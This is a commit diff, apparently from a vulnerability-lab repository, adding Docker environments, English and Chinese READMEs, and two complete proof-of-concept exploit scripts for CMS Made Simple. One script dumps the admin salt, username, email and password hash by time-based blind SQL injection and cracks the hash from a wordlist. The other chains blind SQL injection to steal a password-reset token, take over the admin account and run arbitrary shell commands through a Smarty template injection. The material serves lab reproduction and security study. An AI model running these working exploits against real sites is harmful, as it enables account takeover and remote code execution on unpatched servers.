first commit

cmsms/CVE-2019-9053/README.md

@@ -0,0 +1,38 @@
+# CMS Made Simple (CMSMS) < 2.2.10 Unauthenticated SQL Injection (CVE-2019-9053)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+CMS Made Simple (CMSMS) is a free, open source content management system to provide developers, programmers and site owners a web-based development and administration area.
+
+In the version prior to 2.2.9.1, CMS Made Simple was affected by a unauthenticated SQL injection attack, which attacker is able to gain the administrator's password or password reset token. Combining the authenticated SSTI issue ([CVE-2021-26120](https://github.com/vulhub/vulhub/tree/master/cmsms/CVE-2021-26120)), could allow an attacker to execute arbitrary code on the target server.
+
+References:
+
+- <https://www.exploit-db.com/exploits/46635>
+- <https://srcincite.io/pocs/cve-2021-26120.py.txt>
+
+## Vulnerable Environment
+
+Execute following command to start a CMS Made Simple 2.2.9.1:
+
+```
+docker compose up -d
+```
+
+After the server is started, you should install the CMS at `http://your-ip/install.php`.
+
+Following the install instructions to install the CMSMS, MySQL database address is `db`, database name is `cmsms`, username and password are both `root`.
+
+![](1.png)
+
+## Exploit
+
+Use the script on <https://www.exploit-db.com/exploits/46635> to exploit the SQL injection vulnerability:
+
+```
+python2 poc.py -u http://127.0.0.1
+```
+
+![](2.png)
+
+As you can see, the administrator's password is exposed by SQL injection.

cmsms/CVE-2019-9053/README.zh-cn.md

@@ -0,0 +1,36 @@
+# CMS Made Simple (CMSMS) < 2.2.10 前台SQL注入漏洞（CVE-2019-9053）
+
+CMS Made Simple（CMSMS）是一个免费的开放源码内容管理系统，为开发人员、程序员和网站所有者提供基于网络的开发和管理功能。
+
+在 2.2.9.1 之前的版本中，CMS Made Simple 存在一个未验证的 SQL 注入漏洞，攻击者可利用该漏洞获取管理员密码或密码重置令牌。结合后台的 SSTI 漏洞（[CVE-2021-26120](https://github.com/vulhub/vulhub/tree/master/cmsms/CVE-2021-26120)），攻击者可在目标服务器上执行任意代码。
+
+参考链接：
+
+- <https://www.exploit-db.com/exploits/46635>
+- <https://srcincite.io/pocs/cve-2021-26120.py.txt>
+
+## 漏洞环境
+
+执行如下命令启动一个CMS Made Simple 2.2.9.1服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，你需要访问`http://your-ip/install.php`并安装CMS服务。
+
+安装过程请根据页面中的安装向导来进行，其中MySQL数据库的地址是`db`，数据库名是`cmsms`，账号和密码均为`root`。
+
+![](1.png)
+
+## 漏洞复现
+
+使用<https://www.exploit-db.com/exploits/46635>中的脚本来利用SQL注入漏洞：
+
+```
+python2 poc.py -u http://127.0.0.1
+```
+
+![](2.png)
+
+可见，管理员密码已经被该脚本获取。

cmsms/CVE-2019-9053/docker-compose.yml

@@ -0,0 +1,13 @@
+version: '2'
+services:
+  web:
+    image: vulhub/cmsms:2.2.9.1
+    ports:
+     - "80:80"
+    depends_on:
+     - db
+  db:
+   image: mysql:5.7
+   environment:
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=cmsms

cmsms/CVE-2019-9053/poc.py

@@ -0,0 +1,186 @@
+#!/usr/bin/env python2
+# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
+# Date: 30-03-2019
+# Exploit Author: Daniele Scanu @ Certimeter Group
+# Vendor Homepage: https://www.cmsmadesimple.org/
+# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
+# Version: <= 2.2.9
+# Tested on: Ubuntu 18.04 LTS
+# CVE : CVE-2019-9053
+
+import requests
+from termcolor import colored
+import time
+from termcolor import cprint
+import optparse
+import hashlib
+
+parser = optparse.OptionParser()
+parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
+parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
+parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
+
+options, args = parser.parse_args()
+if not options.url:
+    print "[+] Specify an url target"
+    print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
+    print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
+    print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
+    exit()
+
+url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
+session = requests.Session()
+dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
+flag = True
+password = ""
+temp_password = ""
+TIME = 1
+db_name = ""
+output = ""
+email = ""
+
+salt = ''
+wordlist = ""
+if options.wordlist:
+    wordlist += options.wordlist
+
+def crack_password():
+    global password
+    global output
+    global wordlist
+    global salt
+    dict = open(wordlist)
+    for line in dict.readlines():
+        line = line.replace("\n", "")
+        beautify_print_try(line)
+        if hashlib.md5(str(salt) + line).hexdigest() == password:
+            output += "\n[+] Password cracked: " + line
+            break
+    dict.close()
+
+def beautify_print_try(value):
+    global output
+    print "\033c"
+    cprint(output,'green', attrs=['bold'])
+    cprint('[*] Try: ' + value, 'red', attrs=['bold'])
+
+def beautify_print():
+    global output
+    print "\033c"
+    cprint(output,'green', attrs=['bold'])
+
+def dump_salt():
+    global flag
+    global salt
+    global output
+    ord_salt = ""
+    ord_salt_temp = ""
+    while flag:
+        flag = False
+        for i in range(0, len(dictionary)):
+            temp_salt = salt + dictionary[i]
+            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
+            beautify_print_try(temp_salt)
+            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
+            url = url_vuln + "&m1_idlist=" + payload
+            start_time = time.time()
+            r = session.get(url)
+            elapsed_time = time.time() - start_time
+            if elapsed_time >= TIME:
+                flag = True
+                break
+        if flag:
+            salt = temp_salt
+            ord_salt = ord_salt_temp
+    flag = True
+    output += '\n[+] Salt for password found: ' + salt
+
+def dump_password():
+    global flag
+    global password
+    global output
+    ord_password = ""
+    ord_password_temp = ""
+    while flag:
+        flag = False
+        for i in range(0, len(dictionary)):
+            temp_password = password + dictionary[i]
+            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
+            beautify_print_try(temp_password)
+            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
+            payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
+            url = url_vuln + "&m1_idlist=" + payload
+            start_time = time.time()
+            r = session.get(url)
+            elapsed_time = time.time() - start_time
+            if elapsed_time >= TIME:
+                flag = True
+                break
+        if flag:
+            password = temp_password
+            ord_password = ord_password_temp
+    flag = True
+    output += '\n[+] Password found: ' + password
+
+def dump_username():
+    global flag
+    global db_name
+    global output
+    ord_db_name = ""
+    ord_db_name_temp = ""
+    while flag:
+        flag = False
+        for i in range(0, len(dictionary)):
+            temp_db_name = db_name + dictionary[i]
+            ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
+            beautify_print_try(temp_db_name)
+            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
+            url = url_vuln + "&m1_idlist=" + payload
+            start_time = time.time()
+            r = session.get(url)
+            elapsed_time = time.time() - start_time
+            if elapsed_time >= TIME:
+                flag = True
+                break
+        if flag:
+            db_name = temp_db_name
+            ord_db_name = ord_db_name_temp
+    output += '\n[+] Username found: ' + db_name
+    flag = True
+
+def dump_email():
+    global flag
+    global email
+    global output
+    ord_email = ""
+    ord_email_temp = ""
+    while flag:
+        flag = False
+        for i in range(0, len(dictionary)):
+            temp_email = email + dictionary[i]
+            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
+            beautify_print_try(temp_email)
+            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
+            url = url_vuln + "&m1_idlist=" + payload
+            start_time = time.time()
+            r = session.get(url)
+            elapsed_time = time.time() - start_time
+            if elapsed_time >= TIME:
+                flag = True
+                break
+        if flag:
+            email = temp_email
+            ord_email = ord_email_temp
+    output += '\n[+] Email found: ' + email
+    flag = True
+
+dump_salt()
+dump_username()
+dump_email()
+dump_password()
+
+if options.cracking:
+    print colored("[*] Now try to crack password")
+    crack_password()
+
+beautify_print()

cmsms/CVE-2021-26120/README.md

@@ -0,0 +1,42 @@
+# CMS Made Simple (CMSMS) Unauthenticated Remote Code Execution (CVE-2019-9053/CVE-2021-26120)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+CMS Made Simple (CMSMS) is a free, open source content management system to provide developers, programmers and site owners a web-based development and administration area.
+
+Smarty before 3.1.39 allows code injection via an unexpected function name after a `{function name=` substring, CVE-2021-26120 was assigned to this issue.
+
+CMS Made Simple version <= 2.2.15, a user that is authenticated with designer permissions can trigger a server side template injection, the CVE-2021-26120 mentioned above.
+
+So, if the CMSMS version is prior to 2.2.9.1, unauthencated attacker is able to chain [CVE-2019-9053](https://github.com/vulhub/vulhub/tree/master/cmsms/CVE-2019-9053) and CVE-2021-26120 to execute arbitrary code in the server.
+
+References:
+
+- <https://srcincite.io/pocs/cve-2021-26120.py.txt>
+- <https://www.exploit-db.com/exploits/46635>
+
+## Vulnerable Environment
+
+Execute following command to start a CMS Made Simple 2.2.9.1:
+
+```
+docker compose up -d
+```
+
+After the server is started, you should install the CMS at `http://your-ip/install.php`.
+
+Following the install instructions to install the CMSMS, MySQL database address is `db`, database name is `cmsms`, username and password are both `root`.
+
+![](1.png)
+
+## Exploit
+
+Use the [POC](poc.py) inside the <https://srcincite.io/pocs/cve-2021-26120.py.txt> to reset the administrator password and execute arbitrary commands:
+
+```
+python poc.py 127.0.0.1 / id
+```
+
+![](2.png)
+
+As you can see, `id` command has been executed.

cmsms/CVE-2021-26120/README.zh-cn.md

@@ -0,0 +1,40 @@
+# CMS Made Simple (CMSMS) 前台代码执行漏洞（CVE-2021-26120）
+
+CMS Made Simple（CMSMS）是一个免费的开放源码内容管理系统，为开发人员、程序员和网站所有者提供基于网络的开发和管理功能。
+
+Smarty 3.1.39 之前的版本允许在 `{function name=` 子串后注入PHP代码，导致代码注入漏洞，该漏洞即为CVE-2021-26120。
+
+CMS Made Simple 版本 <= 2.2.15，拥有设计师权限的用户可以在后台利用服务端模板注入漏洞，即为前面提到的CVE-2021-26120。
+
+因此，如果CMSMS版本低于2.2.9.1，未授权的攻击者可以结合[CVE-2019-9053](https://github.com/vulhub/vulhub/tree/master/cmsms/CVE-2019-9053)和CVE-2021-26120漏洞，在服务器上执行任意代码。
+
+参考链接：
+
+- <https://www.exploit-db.com/exploits/46635>
+- <https://srcincite.io/pocs/cve-2021-26120.py.txt>
+
+## 漏洞环境
+
+执行如下命令启动一个CMS Made Simple 2.2.9.1服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，你需要访问`http://your-ip/install.php`并安装CMS服务。
+
+安装过程请根据页面中的安装向导来进行，其中MySQL数据库的地址是`db`，数据库名是`cmsms`，账号和密码均为`root`。
+
+![](1.png)
+
+## 漏洞复现
+
+使用<https://srcincite.io/pocs/cve-2021-26120.py.txt>中分享的[POC](poc.py)，可以使用SQL注入漏洞重置管理员密码，并执行任意命令：
+
+```
+python poc.py 127.0.0.1 / id
+```
+
+![](2.png)
+
+可见，`id`命令已被成功执行。

cmsms/CVE-2021-26120/docker-compose.yml

@@ -0,0 +1,13 @@
+version: '2'
+services:
+  web:
+    image: vulhub/cmsms:2.2.9.1
+    ports:
+     - "80:80"
+    depends_on:
+     - db
+  db:
+   image: mysql:5.7
+   environment:
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=cmsms

cmsms/CVE-2021-26120/poc.py

@@ -0,0 +1,160 @@
+import requests
+import sys
+import re
+from time import sleep
+from lxml import etree
+
+def login(s, t, usr):
+    uri = "%sadmin/login.php" % t
+    s.get(uri)
+    d = {
+        "username" : usr,
+        "password" : usr,
+        "loginsubmit" : "Submit"
+    }
+    r = s.post(uri, data=d)
+    match = re.search("style.php\?__c=(.*)\"", r.text)
+    assert match, "(-) login failed"
+    return match.group(1)
+
+def trigger_or_patch_ssti(s, csrf, t, tpl):
+    # CVE-2021-26120 
+    d = {
+        "mact": 'DesignManager,m1_,admin_edit_template,0',
+        "__c" : csrf,
+        "m1_tpl" : 10,
+        "m1_submit" : "Submit",
+        "m1_name" : "Simplex",
+        "m1_contents" : tpl
+    }
+    r = s.post("%sadmin/moduleinterface.php" % t, files={}, data=d)
+    if "rce()" in tpl:
+        r = s.get("%sindex.php" % t)
+        assert ("endrce" in r.text), "(-) rce failed!"
+        cmdr = r.text.split("endrce")[0]
+        print(cmdr.strip())
+
+def determine_bool(t, exp):
+    p = {
+       "mact" : "News,m1_,default,0",
+       "m1_idlist": ",1)) and %s-- " % exp
+    }
+    r = requests.get("%smoduleinterface.php" % t, params=p) 
+    return True if r.text.count("Posted by:") == 2 else False
+
+def trigger_sqli(t, char, sql, c_range):
+    # CVE-2019-9053
+    for i in c_range:
+        # <> characters are html escaped so we just have =
+        # substr w/ from/for because anymore commas and the string is broken up resulting in an invalid query
+        if determine_bool(t, ",1)) and ascii(substr((%s) from %d for 1))=%d-- " % (sql, char, i)): return chr(i) 
+    return -1
+    
+def leak_string(t, sql, leak_name, max_length, c_range):
+    sys.stdout.write("(+) %s: " % leak_name)
+    sys.stdout.flush()
+    leak_string = ""
+    for i in range(1,max_length+1):
+        c = trigger_sqli(t, i, sql, c_range)
+        # username is probably < 25 characters
+        if c == -1:
+            break
+        leak_string += c
+        sys.stdout.write(c)
+        sys.stdout.flush()
+    assert len(leak_string) > 0, "(-) sql injection failed for %s!" % leak_name
+    return leak_string    
+    
+def reset_pwd_stage1(t, usr):
+    d = {
+        "forgottenusername" : usr,
+        "forgotpwform" : 1,
+    }
+    r = requests.post("%sadmin/login.php" % t, data=d)
+    assert ("User Not Found" not in r.text), "(-) password reset failed!"
+
+def reset_pwd_stage2(t, usr, key):
+    d = {
+        "username" : usr,
+        "password" : usr,      # just reset to the username
+        "passwordagain" : usr, # just reset to the username
+        "changepwhash" : key,
+        "forgotpwchangeform": 1,
+        "loginsubmit" : "Submit",
+    }
+    r = requests.post("%sadmin/login.php" % t, data=d)
+    match = re.search("Welcome: <a href=\"myaccount.php\?__c=[a-z0-9]*\">(.*)<\/a>", r.text)
+    assert match, "(-) password reset failed!"
+    assert match.group(1) == usr, "(-) password reset failed!"
+
+def leak_simplex(s, t, csrf):
+    p = {
+        "mact" : "DesignManager,m1_,admin_edit_template,0",
+        "__c" : csrf,
+        "m1_tpl" : 10
+    }
+    r = s.get("%sadmin/moduleinterface.php" % t, params=p)
+    page = etree.HTML(r.text)
+    tpl = page.xpath("//textarea//text()")
+    assert tpl is not None, "(-) leaking template failed!"
+    return "".join(tpl)
+
+def remove_locks(s, t, csrf):
+    p = {
+        "mact" : "DesignManager,m1_,admin_clearlocks,0",
+        "__c" : csrf,
+        "m1_type" : "template"
+    }
+    s.get("%sadmin/moduleinterface.php" % t, params=p)
+
+def main():
+    if(len(sys.argv) < 4):
+        print("(+) usage: %s <host> <path> <cmd>" % sys.argv[0])
+        print("(+) eg: %s 192.168.75.141 / id" % sys.argv[0])
+        print("(+) eg: %s 192.168.75.141 /cmsms/ \"uname -a\"" % sys.argv[0])
+        return
+    pth = sys.argv[2]
+    cmd = sys.argv[3]
+    pth = pth + "/" if not pth.endswith("/") else pth
+    pth = "/" + pth if not pth.startswith("/") else pth
+    target = "http://%s%s" % (sys.argv[1], pth)
+    print("(+) targeting %s" % target)
+    if determine_bool(target, "1=1") and not determine_bool(target, "1=2"):
+        print("(+) sql injection working!")
+    print("(+) leaking the username...")
+    username = leak_string(
+        target,
+        "select username from cms_users where user_id=1",
+        "username",
+        25, # username column is varchar(25) in the db
+        list(range(48,58)) + list(range(65,91)) + list(range(97,123)) # charset: 0-9A-Za-z
+    )
+    print("\n(+) resetting the %s's password stage 1" % username)
+    reset_pwd_stage1(target, username)
+    print("(+) leaking the pwreset token...")
+    pwreset = leak_string(
+        target,
+        "select value from cms_userprefs where preference=0x70777265736574 and user_id=1", # qoutes will break things
+        "pwreset",
+        32, # md5 hash is always 32
+        list(range(48,58)) + list(range(97,103)) # charset: 0-9a-f
+    )
+    print("\n(+) done, resetting the %s's password stage 2" % username)
+    reset_pwd_stage2(target, username, pwreset)
+    session = requests.Session()
+    print("(+) logging in...")
+    csrf = login(session, target, username)
+    print("(+) leaking simplex template...")
+    remove_locks(session, target, csrf)
+    simplex_tpl = leak_simplex(session, target, csrf)
+    print("(+) injecting payload and executing cmd...\n")
+    rce_tpl = "{function name='rce(){};system(\"%s\");function '}{/function}endrce" % cmd
+    trigger_or_patch_ssti(session, csrf, target, rce_tpl+simplex_tpl)
+    while True:
+        r = session.get("%sindex.php" % target)
+        if "endrce" not in r.text:
+            break
+        trigger_or_patch_ssti(session, csrf, target, simplex_tpl)
+
+if __name__ == '__main__':
+    main()